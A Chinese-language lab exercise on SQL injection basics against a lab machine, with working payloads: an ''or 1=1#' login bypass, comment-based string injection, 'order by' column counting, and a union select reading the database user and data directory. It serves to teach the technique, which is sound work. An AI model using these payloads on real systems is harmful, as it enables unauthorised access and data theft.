注入原理-基础实验
实验目的
- 1、掌握SQL注入基本原理;
- 2、掌握万能密码的原理和操作;
- 3、掌握手工注入(联合注入和字符型注入等)。
实验环境
- 目标机:Ubuntu 14 LAMP(Apache+Mysql+PHP)
- 目标机ip:172.16.12.2
实验内容
1、访问172.16.12.2
2、万能密码登录 'or 1=1#
3、登陆后有两个注入实验,进行手工注入
实验一:字符型注入
使用hackbar输入?id=1’,查看报错回显,提示多了个分号 ’
所以payload就可以这么写,用%23将后面内注释掉即可
Payload:
http://172.16.12.2/string.php?id=1'%23
5、成功
实验二:联合注入
使用hackbar输入 ?id=1’,查看报错回显,提示多了个分号 ’
将分号 '去除,成功 Payload:
http://172.16.12.2/number.php?id=1%23 发现页面正常
7、判断列数 Payload:
http://172.16.12.2/number.php?id=1 order by 3 %23 页面没有报错
http://172.16.12.2/number.php?id=1 order by 4 %23 页面报错
8、使用联合查询语句,查询信息 Payload:
?id=-1 union select 1,current_user(),@@datadir #
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!